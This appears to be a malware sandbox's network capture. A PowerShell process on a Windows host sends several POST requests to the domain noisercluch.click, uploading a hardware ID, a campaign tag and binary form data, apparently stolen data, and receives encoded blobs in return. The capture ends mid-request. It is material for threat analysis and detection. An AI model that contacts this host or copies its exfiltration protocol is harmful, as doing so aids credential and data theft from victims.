                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=2qgqkiplf8kdndjc06ik72pq3t; expires=Sun, 27 Apr 2025 09:57:54 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q206eadHIDAaRlRWF7Z3Kyxya8T3Cp3ShyIZUdsb8W%2FrqJqyuHtvvNpKAv0zste%2BfMGWz%2BqflRUQzkfiQwLe7cu5RQ4iYbIbhguKRCXlhJmCq2QwNLPe7%2FxAUO6LUQLdrUzB3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8fb3c8bb0c1b43fe-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1556&rtt_var=607&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2840&recv_bytes=908&delivery_rate=1767554&cwnd=236&unsent_bytes=0&cid=390e67ce361e0ece&ts=520&x=0"
                                                          2025-01-01 16:11:15 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                          Data Ascii: 2ok
                                                          2025-01-01 16:11:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.449855188.114.96.34431196C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-01 16:11:15 UTC265OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 47
                                                          Host: noisercluch.click
                                                          2025-01-01 16:11:15 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 57 47 36 49 36 53 2d 2d 77 65 62 34 34 26 6a 3d
                                                          Data Ascii: act=recive_message&ver=4.0&lid=WG6I6S--web44&j=
                                                          2025-01-01 16:11:16 UTC1127INHTTP/1.1 200 OK
                                                          Date: Wed, 01 Jan 2025 16:11:16 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=nkkf29t83cvne0108aamalvd6r; expires=Sun, 27 Apr 2025 09:57:55 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2YL16HzYmrDzRefsfHF1xX8oBJ7VaOBCvv5KFiD3OQ9YwXJXycdf3xBAQJ6Aj0AWjytrhv2spF9j0f97NNDvHyPDKCA4%2Fl12wIKCCf1ARfmr8lUG2GJOg%2BdvJEcoyzzNdiBC7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8fb3c8c10b5bde96-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1587&rtt_var=605&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=948&delivery_rate=1795817&cwnd=224&unsent_bytes=0&cid=a782c547ce740785&ts=475&x=0"
                                                          2025-01-01 16:11:16 UTC242INData Raw: 34 39 39 34 0d 0a 48 68 54 43 54 6a 6d 6b 66 53 64 35 64 72 6e 2b 6b 44 63 51 30 41 69 4d 71 78 78 2f 5a 50 2b 36 49 63 55 6c 4f 76 71 7a 62 32 39 6c 4e 72 52 73 41 35 42 52 42 51 6f 54 6d 38 54 6b 52 57 57 31 4a 4b 37 4b 65 46 31 65 6d 64 74 4e 74 6b 41 57 32 4d 55 43 54 53 52 79 6f 79 4a 4b 77 56 45 46 48 41 36 62 78 4d 74 4d 4d 72 56 6d 72 70 45 2b 47 67 36 64 32 30 32 6e 52 46 47 56 77 77 4d 4d 64 6e 69 6c 4a 6c 7a 48 47 55 59 56 47 39 79 62 39 56 5a 36 76 6d 48 68 77 33 46 64 53 4e 33 66 57 2b 63 66 47 4c 66 57 47 77 35 54 64 62 45 6c 47 39 6c 52 58 46 73 54 31 39 79 71 46 58 47 31 61 75 44 4e 65 42 51 4d 6c 39 4a 46 70 6b 46 51 69 74 6f 4a 42 33 5a 32 70 69 64 57 7a 67 31 4c 48 78 7a 58 6e 66 39 57 4d 76 77 71
                                                          Data Ascii: 4994HhTCTjmkfSd5drn+kDcQ0AiMqxx/ZP+6IcUlOvqzb29lNrRsA5BRBQoTm8TkRWW1JK7KeF1emdtNtkAW2MUCTSRyoyJKwVEFHA6bxMtMMrVmrpE+Gg6d202nRFGVwwMMdnilJlzHGUYVG9yb9VZ6vmHhw3FdSN3fW+cfGLfWGw5TdbElG9lRXFsT19yqFXG1auDNeBQMl9JFpkFQitoJB3Z2pidWzg1LHxzXnf9WMvwq
                                                          2025-01-01 16:11:16 UTC1369INData Raw: 36 64 45 2b 52 55 62 4f 36 6b 43 32 56 6b 32 56 77 51 74 4e 59 7a 69 35 62 46 7a 4b 58 78 31 62 48 4e 65 53 39 31 5a 39 74 57 76 75 32 33 45 64 42 5a 58 51 52 36 31 49 56 35 66 66 42 77 70 30 66 36 63 6a 58 4d 34 5a 53 68 68 55 6c 64 7a 31 54 54 4c 71 4b 73 37 5a 66 52 34 53 6b 4d 6b 44 75 41 6c 42 32 4e 59 42 54 53 51 32 70 69 4a 61 79 78 39 58 45 78 2f 51 6d 65 42 65 65 37 39 6e 37 73 52 30 45 67 57 64 33 30 6d 74 53 46 4b 63 33 41 41 4c 66 48 62 67 59 68 76 42 42 77 56 44 56 50 69 5a 34 6c 4a 2b 70 43 6a 55 69 57 46 54 48 39 33 66 54 2b 63 66 47 4a 44 55 44 67 35 33 65 61 4d 6b 55 4e 51 66 56 78 30 5a 33 6f 37 30 55 48 79 34 61 66 7a 44 63 42 73 46 6c 4e 4e 4b 6f 6b 42 63 32 4a 39 4e 43 6d 51 32 2b 47 78 36 79 78 52 4a 45 51 50 62 33 4f 30 62 61 2f 4a
                                                          Data Ascii: 6dE+RUbO6kC2Vk2VwQtNYzi5bFzKXx1bHNeS91Z9tWvu23EdBZXQR61IV5ffBwp0f6cjXM4ZShhUldz1TTLqKs7ZfR4SkMkDuAlB2NYBTSQ2piJayx9XEx/QmeBee79n7sR0EgWd30mtSFKc3AALfHbgYhvBBwVDVPiZ4lJ+pCjUiWFTH93fT+cfGJDUDg53eaMkUNQfVx0Z3o70UHy4afzDcBsFlNNKokBc2J9NCmQ2+Gx6yxRJEQPb3O0ba/J
                                                          2025-01-01 16:11:16 UTC1369INData Raw: 42 73 4a 6b 4e 51 44 36 51 64 66 67 4a 46 56 54 56 5a 31 74 43 39 52 68 43 70 47 46 52 72 63 69 72 4a 4b 50 4b 73 71 36 63 55 2b 52 55 61 51 32 55 75 68 56 56 65 56 30 67 4d 44 63 33 4f 76 4a 46 76 47 45 6b 41 66 48 39 43 66 2f 31 46 67 75 47 72 6d 7a 48 38 58 44 4e 32 57 41 36 42 66 47 4d 43 52 50 42 70 33 4e 4a 55 76 56 63 67 59 55 31 73 4c 6c 59 57 79 55 6e 37 79 4d 71 37 45 64 68 67 44 6b 74 6c 4a 71 55 4a 53 6c 4e 6b 44 44 6d 35 35 70 43 78 58 7a 68 56 49 46 52 44 54 6c 66 6c 65 64 4c 4a 72 35 49 6b 77 58 51 47 46 6d 42 76 6e 63 31 2b 55 33 41 4a 50 53 58 57 75 49 6c 7a 51 58 31 70 56 44 5a 75 62 2f 68 55 71 38 6d 62 6e 79 58 55 58 41 70 33 66 54 71 4a 45 58 35 76 63 43 67 64 79 63 61 51 67 55 73 73 5a 52 52 77 51 33 6f 37 33 58 48 36 2b 4b 71 43 4a
                                                          Data Ascii: BsJkNQD6QdfgJFVTVZ1tC9RhCpGFRrcirJKPKsq6cU+RUaQ2UuhVVeV0gMDc3OvJFvGEkAfH9Cf/1FguGrmzH8XDN2WA6BfGMCRPBp3NJUvVcgYU1sLlYWyUn7yMq7EdhgDktlJqUJSlNkDDm55pCxXzhVIFRDTlfledLJr5IkwXQGFmBvnc1+U3AJPSXWuIlzQX1pVDZub/hUq8mbnyXUXAp3fTqJEX5vcCgdycaQgUssZRRwQ3o73XH6+KqCJ
                                                          2025-01-01 16:11:16 UTC1369INData Raw: 50 42 41 36 42 4c 47 4d 43 52 42 41 52 75 65 4b 34 6c 56 73 41 58 51 68 55 5a 30 4a 72 35 55 6e 57 30 5a 2b 62 45 65 78 34 48 6d 64 4a 52 70 45 78 53 6c 64 74 4e 51 7a 78 78 75 47 77 44 68 6a 68 4a 4d 67 54 41 6a 75 51 56 62 66 78 7a 72 73 35 79 58 56 37 64 32 30 79 75 53 46 43 51 33 67 49 4a 63 6e 43 6d 49 56 37 4a 46 56 63 54 47 74 61 58 2f 56 35 67 73 6d 66 71 78 58 6f 56 44 5a 65 59 44 65 64 41 51 4e 69 4a 54 54 68 78 65 61 41 76 54 59 59 41 43 77 4a 55 33 4a 43 79 44 54 4b 2b 5a 4f 37 47 63 68 45 4e 6c 64 6c 50 71 55 42 64 6b 64 6b 46 48 33 31 79 71 43 31 56 79 52 35 42 48 68 48 66 6d 2f 5a 54 66 66 49 6b 72 73 35 6d 58 56 37 64 39 32 53 53 42 58 6d 69 6b 52 4a 44 5a 54 61 6e 49 42 75 65 58 30 6b 59 47 4e 4f 54 39 46 78 2b 75 47 50 6c 78 58 55 5a 43
                                                          Data Ascii: PBA6BLGMCRBARueK4lVsAXQhUZ0Jr5UnW0Z+bEex4HmdJRpExSldtNQzxxuGwDhjhJMgTAjuQVbfxzrs5yXV7d20yuSFCQ3gIJcnCmIV7JFVcTGtaX/V5gsmfqxXoVDZeYDedAQNiJTThxeaAvTYYACwJU3JCyDTK+ZO7GchENldlPqUBdkdkFH31yqC1VyR5BHhHfm/ZTffIkrs5mXV7d92SSBXmikRJDZTanIBueX0kYGNOT9Fx+uGPlxXUZC
                                                          2025-01-01 16:11:16 UTC1369INData Raw: 6f 52 6c 6d 65 77 77 6f 45 62 6e 69 74 49 31 50 4f 46 6b 51 66 45 64 61 61 2f 6c 39 7a 74 57 54 67 77 54 35 54 52 70 72 41 41 2f 38 48 65 59 6a 4b 48 78 74 78 56 36 30 6a 47 39 6c 52 58 46 73 54 31 39 79 71 46 58 75 67 62 75 50 62 64 78 6f 49 6b 74 74 52 70 6b 70 54 69 74 59 43 43 58 74 36 70 69 4e 64 78 78 70 50 46 78 50 65 6c 2f 31 5a 4d 76 77 71 36 64 45 2b 52 55 61 7a 30 31 43 77 52 46 61 54 78 78 5a 4e 59 7a 69 35 62 46 7a 4b 58 78 31 62 46 39 43 58 39 6c 56 2b 73 6d 37 6a 79 57 77 53 41 5a 72 52 53 4c 56 4e 58 35 2f 61 42 51 5a 7a 63 4c 49 67 56 64 51 61 56 77 6c 55 6c 64 7a 31 54 54 4c 71 4b 74 6a 4f 62 67 30 46 33 2b 6c 56 70 46 46 54 6c 64 31 4e 45 6a 4a 76 34 43 74 58 68 6b 63 46 48 52 76 53 6e 2f 31 55 65 37 35 6e 36 38 42 37 48 41 43 5a 30 6b
                                                          Data Ascii: oRlmewwoEbnitI1POFkQfEdaa/l9ztWTgwT5TRprAA/8HeYjKHxtxV60jG9lRXFsT19yqFXugbuPbdxoIkttRpkpTitYCCXt6piNdxxpPFxPel/1ZMvwq6dE+RUaz01CwRFaTxxZNYzi5bFzKXx1bF9CX9lV+sm7jyWwSAZrRSLVNX5/aBQZzcLIgVdQaVwlUldz1TTLqKtjObg0F3+lVpFFTld1NEjJv4CtXhkcFHRvSn/1Ue75n68B7HACZ0k
                                                          2025-01-01 16:11:16 UTC1369INData Raw: 32 4d 35 44 46 44 78 78 72 47 77 44 68 68 78 43 47 42 58 52 6c 66 35 61 64 62 5a 34 35 4d 35 73 48 41 65 57 31 55 2b 6e 53 6c 57 53 30 41 51 41 63 48 75 6e 4b 31 54 44 58 77 74 62 45 38 50 63 71 68 56 54 76 32 48 69 6b 69 52 64 47 64 50 42 41 36 42 4c 47 4d 43 52 44 51 64 35 66 4b 30 76 56 4d 55 4e 52 42 30 47 32 35 48 34 52 33 69 35 62 2b 50 45 63 78 34 41 6d 39 4e 50 74 55 35 59 6d 39 70 4e 51 7a 78 78 75 47 77 44 68 6a 78 53 44 52 37 63 6b 4f 52 65 63 37 46 38 34 39 6b 2b 55 30 61 4d 33 31 4c 6e 48 30 36 49 78 67 6f 53 4d 6d 2f 67 4b 31 65 47 52 77 55 64 48 64 32 62 39 46 74 67 74 32 7a 68 78 6e 63 55 41 70 58 62 51 36 4e 44 58 35 33 53 41 51 5a 37 64 61 38 6f 55 73 67 57 53 6c 74 61 6d 35 76 71 46 53 72 79 53 2f 58 4b 63 68 42 47 67 70 5a 61 35 30 42
                                                          Data Ascii: 2M5DFDxxrGwDhhxCGBXRlf5adbZ45M5sHAeW1U+nSlWS0AQAcHunK1TDXwtbE8PcqhVTv2HikiRdGdPBA6BLGMCRDQd5fK0vVMUNRB0G25H4R3i5b+PEcx4Am9NPtU5Ym9pNQzxxuGwDhjxSDR7ckORec7F849k+U0aM31LnH06IxgoSMm/gK1eGRwUdHd2b9Ftgt2zhxncUApXbQ6NDX53SAQZ7da8oUsgWSltam5vqFSryS/XKchBGgpZa50B
                                                          2025-01-01 16:11:16 UTC1369INData Raw: 55 30 6b 4e 6f 41 6e 54 63 4d 59 55 31 6b 68 32 4a 4c 38 55 6d 54 79 64 64 47 48 50 68 49 63 33 59 42 36 76 67 64 66 6c 4a 46 56 54 57 6c 78 6f 43 74 42 30 42 68 4a 43 68 2f 57 6b 4e 42 61 64 61 52 70 34 63 70 76 46 45 71 57 31 51 50 70 42 31 2b 41 6b 56 56 4e 55 33 47 32 4c 33 54 46 44 6b 78 62 57 70 75 62 35 42 55 71 38 6c 53 75 32 33 30 4e 42 5a 4c 4a 66 65 63 66 51 61 61 52 42 68 74 37 5a 71 4d 36 55 4d 73 54 56 43 56 55 67 38 69 67 42 79 44 67 4f 50 47 4a 59 53 4a 49 33 64 6b 44 2f 33 35 42 32 4d 64 4e 56 53 34 34 34 44 34 62 6e 6c 38 43 47 41 62 4a 6d 76 46 44 63 66 56 55 30 4f 35 6f 46 77 47 4e 33 31 53 6f 42 78 62 59 33 6b 31 56 52 54 61 70 4b 30 44 58 43 55 67 4c 45 35 75 6a 76 42 56 71 38 6a 4b 75 2f 48 30 54 43 4a 72 4f 55 75 70 67 54 70 4c 57
                                                          Data Ascii: U0kNoAnTcMYU1kh2JL8UmTyddGHPhIc3YB6vgdflJFVTWlxoCtB0BhJCh/WkNBadaRp4cpvFEqW1QPpB1+AkVVNU3G2L3TFDkxbWpub5BUq8lSu230NBZLJfecfQaaRBht7ZqM6UMsTVCVUg8igByDgOPGJYSJI3dkD/35B2MdNVS444D4bnl8CGAbJmvFDcfVU0O5oFwGN31SoBxbY3k1VRTapK0DXCUgLE5ujvBVq8jKu/H0TCJrOUupgTpLW
                                                          2025-01-01 16:11:16 UTC1369INData Raw: 72 67 59 68 76 54 46 45 6b 64 47 63 37 54 34 30 4e 78 70 47 32 69 77 57 38 51 43 74 33 6e 44 65 64 66 47 4d 43 52 4f 41 35 79 65 4b 63 36 53 6f 73 2f 54 68 63 58 31 35 33 31 46 54 7a 79 62 4b 36 52 4c 56 4e 47 6d 63 6b 44 2f 78 63 4b 77 34 52 65 57 69 77 6b 76 32 4a 43 68 67 6b 46 51 30 61 56 33 4f 41 56 4b 76 49 74 37 64 74 73 47 77 57 4c 32 77 53 5a 65 56 6d 56 33 6b 45 44 64 33 61 6e 50 45 33 64 55 30 30 59 44 73 47 69 7a 48 35 2b 74 47 33 30 7a 6e 67 37 4a 74 32 57 41 36 67 48 41 4b 47 52 52 55 31 44 4f 4f 41 30 47 35 35 66 63 42 67 61 31 5a 76 6b 52 44 2b 61 53 64 54 7a 50 44 45 42 69 4a 70 33 6f 46 64 4a 6b 39 77 42 54 54 49 32 70 6d 77 44 6c 6c 45 46 48 77 57 62 78 4b 49 48 4b 65 63 35 75 5a 6b 73 41 6b 69 45 6d 46 58 6e 48 77 72 57 6b 52 39 4e 4a
                                                          Data Ascii: rgYhvTFEkdGc7T40NxpG2iwW8QCt3nDedfGMCROA5yeKc6Sos/ThcX1531FTzybK6RLVNGmckD/xcKw4ReWiwkv2JChgkFQ0aV3OAVKvIt7dtsGwWL2wSZeVmV3kEDd3anPE3dU00YDsGizH5+tG30zng7Jt2WA6gHAKGRRU1DOOA0G55fcBga1ZvkRD+aSdTzPDEBiJp3oFdJk9wBTTI2pmwDllEFHwWbxKIHKec5uZksAkiEmFXnHwrWkR9NJ
                                                          2025-01-01 16:11:16 UTC1369INData Raw: 44 6c 56 45 46 43 56 53 44 33 4c 56 62 66 37 4e 70 34 4d 70 73 44 77 43 65 7a 6b 44 67 65 57 61 39 33 41 41 49 63 6e 47 65 45 6e 72 4d 44 30 67 55 45 35 6d 38 39 55 4e 78 6a 46 54 5a 32 48 6b 4e 52 4c 76 62 56 61 51 48 46 74 6a 4a 54 56 55 38 56 36 6f 38 56 73 6b 59 42 7a 73 54 7a 5a 2b 79 47 7a 4b 32 4b 72 61 4a 57 78 41 4c 6d 4e 5a 45 35 57 5a 53 69 4e 77 43 43 6a 35 57 70 7a 70 59 68 6c 45 46 46 31 53 44 33 50 4e 66 59 72 39 6c 36 59 56 35 42 77 48 64 6c 67 4f 70 42 77 44 59 30 41 63 64 63 58 6d 6e 59 46 33 49 45 51 55 45 57 73 4c 63 35 42 55 71 34 53 53 75 32 7a 35 46 52 74 72 62 55 62 56 42 57 34 37 53 53 6a 4e 43 57 37 49 72 53 38 56 64 64 42 59 51 7a 59 6e 78 52 58 57 4d 56 4d 50 62 65 51 30 46 33 2b 6c 56 70 45 64 57 6e 35 46 44 54 57 51 32 2b 47
                                                          Data Ascii: DlVEFCVSD3LVbf7Np4MpsDwCezkDgeWa93AAIcnGeEnrMD0gUE5m89UNxjFTZ2HkNRLvbVaQHFtjJTVU8V6o8VskYBzsTzZ+yGzK2KraJWxALmNZE5WZSiNwCCj5WpzpYhlEFF1SD3PNfYr9l6YV5BwHdlgOpBwDY0AcdcXmnYF3IEQUEWsLc5BUq4SSu2z5FRtrbUbVBW47SSjNCW7IrS8VddBYQzYnxRXWMVMPbeQ0F3+lVpEdWn5FDTWQ2+G


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.449865188.114.96.34431196C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-01 16:11:17 UTC279OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=QCN9PQE8F9B0U7
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 18139
                                                          Host: noisercluch.click
                                                          2025-01-01 16:11:17 UTC15331OUTData Raw: 2d 2d 51 43 4e 39 50 51 45 38 46 39 42 30 55 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 33 30 33 42 44 41 35 36 39 34 36 41 37 32 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 51 43 4e 39 50 51 45 38 46 39 42 30 55 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 43 4e 39 50 51 45 38 46 39 42 30 55 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 34 34 0d 0a 2d 2d 51 43 4e 39 50 51 45 38
                                                          Data Ascii: --QCN9PQE8F9B0U7Content-Disposition: form-data; name="hwid"F9303BDA56946A72D9AC212D15D33917--QCN9PQE8F9B0U7Content-Disposition: form-data; name="pid"2--QCN9PQE8F9B0U7Content-Disposition: form-data; name="lid"WG6I6S--web44--QCN9PQE8
                                                          2025-01-01 16:11:17 UTC2808OUTData Raw: e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11
                                                          Data Ascii: (u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
                                                          2025-01-01 16:11:17 UTC1139INHTTP/1.1 200 OK
                                                          Date: Wed, 01 Jan 2025 16:11:17 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=jhtasqc52vgk849cetmn8c0jnk; expires=Sun, 27 Apr 2025 09:57:56 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OjBQUuk%2F8gbvc8qb4J1TkErJ%2FzQfBaU7pxrRtyvRPwITcgM9AKDvZhlmAgWKVAkM%2FVaLZzgQPdOFoRu5fI%2FCTUHpZEBzIgnSL7lyxVsZNsV06eP63UCP3J%2FJcJgoKAt%2FA0KhpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8fb3c8c7ecbdde98-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1642&rtt_var=626&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2841&recv_bytes=19098&delivery_rate=1734997&cwnd=212&unsent_bytes=0&cid=cdf7651f60cd7771&ts=607&x=0"
                                                          2025-01-01 16:11:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                          Data Ascii: fok 8.46.123.189
                                                          2025-01-01 16:11:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.449871188.114.96.34431196C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-01 16:11:18 UTC279OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=8YGJKPGFYZMNNEC
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 8766
                                                          Host: noisercluch.click
                                                          2025-01-01 16:11:18 UTC8766OUTData Raw: 2d 2d 38 59 47 4a 4b 50 47 46 59 5a 4d 4e 4e 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 33 30 33 42 44 41 35 36 39 34 36 41 37 32 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 38 59 47 4a 4b 50 47 46 59 5a 4d 4e 4e 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 59 47 4a 4b 50 47 46 59 5a 4d 4e 4e 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 34 34 0d 0a 2d 2d 38 59 47 4a 4b
                                                          Data Ascii: --8YGJKPGFYZMNNECContent-Disposition: form-data; name="hwid"F9303BDA56946A72D9AC212D15D33917--8YGJKPGFYZMNNECContent-Disposition: form-data; name="pid"2--8YGJKPGFYZMNNECContent-Disposition: form-data; name="lid"WG6I6S--web44--8YGJK
                                                          2025-01-01 16:11:18 UTC1129INHTTP/1.1 200 OK
                                                          Date: Wed, 01 Jan 2025 16:11:18 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=lnih4m5hpp4ob9aovgkj7nc05c; expires=Sun, 27 Apr 2025 09:57:57 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yeiarOSdH0U6ddnIpkwQNClRwQEDIjd7Dg89TIOXTSCIUxWY6EgooKnTu1xuU6JjGLaw4pBrSlIDxlX5A5gyaahIjes9U1Ub1esxC4KlLdk0NE9ID49K4fOKoJ%2BVvu%2BsNtvyBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8fb3c8ceba4f7c81-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1996&min_rtt=1993&rtt_var=754&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2841&recv_bytes=9703&delivery_rate=1445544&cwnd=240&unsent_bytes=0&cid=a1b9a2c2ac03dd51&ts=526&x=0"
                                                          2025-01-01 16:11:18 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                          Data Ascii: fok 8.46.123.189
                                                          2025-01-01 16:11:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.449881188.114.96.34431196C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-01 16:11:19 UTC273OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=D2TMTQXT
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
